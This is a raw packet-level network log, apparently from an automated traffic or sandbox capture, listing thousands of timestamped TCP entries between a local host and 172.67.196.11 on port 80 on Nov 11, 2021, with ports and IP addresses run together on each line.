                                                                                                                              Nov 11, 2021 20:35:49.126653910 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.126661062 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126686096 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126703024 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126729012 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126744986 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126770973 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126775980 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.126780987 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.126792908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126808882 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126835108 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126851082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126877069 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126899004 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126924992 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126941919 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126966953 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.126971006 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.126977921 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.126983881 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127007961 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127023935 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127049923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127064943 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127094030 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127110958 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127137899 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127140999 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127146959 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127156973 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127175093 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127199888 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127218962 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127244949 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127263069 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127289057 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127305031 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127331018 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127336025 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127342939 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127350092 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127372026 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127389908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127415895 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127430916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127458096 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127475023 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127501011 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127505064 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127511024 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127521992 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127548933 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127566099 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127593040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127609968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127612114 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127630949 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127650023 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127671003 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127687931 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127713919 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127718925 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127724886 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127729893 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127756119 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127774000 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127795935 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127813101 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127821922 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127832890 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127855062 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127871990 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127892971 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127909899 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127918005 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.127929926 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127948999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127969980 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127986908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.127990961 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128009081 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128026009 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128047943 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128070116 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128096104 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128112078 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128130913 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128138065 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128138065 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128154993 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128176928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128196955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128216028 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128217936 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128237963 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128261089 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128281116 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128302097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128319025 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128345013 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128361940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128386974 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128392935 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128398895 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128405094 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128427982 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128444910 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128468990 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128485918 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128498077 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128509045 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128515005 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128525019 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128551960 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128570080 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128597021 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128601074 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128606081 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128614902 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128645897 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128663063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128689051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128705978 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128732920 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128739119 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128751040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128777981 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128793955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128820896 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128823042 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128839016 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128875017 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128891945 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128917933 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128925085 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128941059 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128942013 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.128957987 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128979921 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.128998041 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129000902 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129019976 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129035950 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129057884 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129076958 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129079103 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129097939 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129113913 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129134893 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129139900 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129158020 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129180908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129198074 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129228115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129245043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129257917 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129271030 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129288912 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129311085 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129328012 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129354000 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129373074 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129385948 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129390955 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129398108 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129417896 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129446030 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129462957 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129488945 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129508018 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129534006 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129539967 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129550934 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129573107 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129590034 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129626036 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129642963 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129672050 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129677057 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129683018 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129690886 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129719973 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129738092 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129765987 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129782915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129832983 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129834890 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129856110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129878998 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129906893 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129923105 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129950047 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129955053 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.129967928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.129971981 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130007029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130014896 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130024910 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130045891 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130062103 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130088091 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130105972 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130109072 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130127907 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130146980 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130168915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130172014 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130186081 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130207062 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130223989 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130228996 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130248070 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130268097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130290031 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130306959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130311966 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130328894 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130347967 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130369902 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130386114 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130398035 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130408049 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130424976 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130446911 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130462885 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130489111 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130506039 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130531073 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130536079 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130543947 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.130548000 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130573034 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.130780935 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.132575989 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.147342920 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147362947 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147394896 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147413015 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147442102 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147459030 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147486925 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147505045 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147531986 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147594929 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.147608995 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147625923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147650003 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147670984 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147671938 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.147692919 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147716045 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147735119 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.147741079 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147763968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147775888 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.147787094 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147810936 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147830963 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147855997 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147876978 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147901058 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147921085 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147938013 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.147943974 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.147944927 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147969007 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.147985935 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148014069 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148027897 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148035049 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148060083 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148077011 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148103952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148107052 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148113012 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148123980 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148143053 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148170948 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148190975 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148210049 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148227930 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148256063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148260117 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148266077 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148277044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148296118 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148327112 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148351908 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148354053 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148376942 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148402929 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148426056 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148448944 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148468018 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148482084 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148485899 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148509026 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148525000 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148541927 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148562908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148581028 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148597002 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148617029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148642063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148605108 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148668051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148684025 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148689985 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148689985 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148695946 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148708105 CET8049751172.67.196.11192.168.2.3
